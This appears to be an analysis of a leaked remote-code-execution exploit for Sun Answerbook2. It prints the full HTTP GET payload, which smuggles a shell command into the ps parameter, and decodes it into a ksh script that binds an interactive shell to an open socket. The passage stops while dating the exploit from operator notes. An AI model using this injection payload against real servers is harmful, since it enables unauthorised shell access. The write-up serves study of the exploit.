ANSWERBOOK

ANSWERBOOK is an RCE exploit for Sun Answerbook2. Given the software and the opsnotes, it’s likely that this exploit was used around 2000-2005.

According to abopscript.txt it will trigger a shell using the following HTTP GET command:

GET /ab2/@LegacyPageView?ps=`echo%20"\%0A(/bin/ksh<<\%2B%0As=63%0Awhile%20[%20ABC%20-gt%208%20]%0Ado%0A[[%20-S%20/dev/fd/ABC%20]]%20%26%26%20break%0A((s=ABC-1))%0Adone%0A[%20ABC%20-gt%208%20]%20%26%26%20exec%20sh%20-i%20</dev/fd/ABC%20>%20/dev/fd/ABC%202>%261%20%26%0A%2B%0A)2>/dev/null%26%0A"%20|%20sed%20's/ABC/$s/g'%20|%20sh` HTTP/1.0

Cleaning up the command a bit:

echo "\
(/bin/ksh<<\+
s=63
while [ ABC -gt 8 ]
do
[[ -S /dev/fd/ABC ]] && break
((s=ABC-1))
done
[ ABC -gt 8 ] && exec sh -i </dev/fd/ABC > /dev/fd/ABC 2>&1 &
+
)2>/dev/null&
" | sed 's/ABC/$s/g' | sh

Cleaning it even more, it runs this command using sh:

(/bin/ksh<<\+
	s=63
	while [ $s -gt 8 ]
	do
		[[ -S /dev/fd/$s ]] && break
		((s=$s-1))
	done
	[ $s -gt 8 ] && exec sh -i </dev/fd/$s > /dev/fd/$s 2>&1 &
+
)2>/dev/null &

The <<\+ until the + is a HEREDOC, essentially executing the commands with /bin/ksh. It will find a find a filedescriptor (bigger than 8) that is a socket and redirect the input and output to a shell, giving the Operator a shell.

Reason for 2000-2005

Above, I vaguely mention that according to the opsnotes and software, the exploit was used in the period of 2000-2005. The reasons for this are:

• /tmp/.X11R6: as “work” folder for an Operation.
• The use of nosy